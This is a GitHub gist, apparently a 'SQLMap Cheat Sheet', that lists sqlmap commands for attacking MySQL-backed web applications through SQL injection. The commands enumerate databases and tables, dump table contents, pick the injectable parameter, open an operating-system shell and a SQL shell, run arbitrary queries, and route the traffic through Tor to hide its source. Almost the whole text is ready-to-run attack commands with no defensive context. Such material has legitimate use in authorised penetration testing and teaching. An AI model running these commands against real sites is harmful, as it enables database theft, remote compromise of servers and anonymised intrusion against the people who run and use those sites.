# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1
# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
-
-
Save ingramali/af16d31eace1f90574147cbc94e9e965 to your computer and use it in GitHub Desktop.
SQLMap Cheat Sheet
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment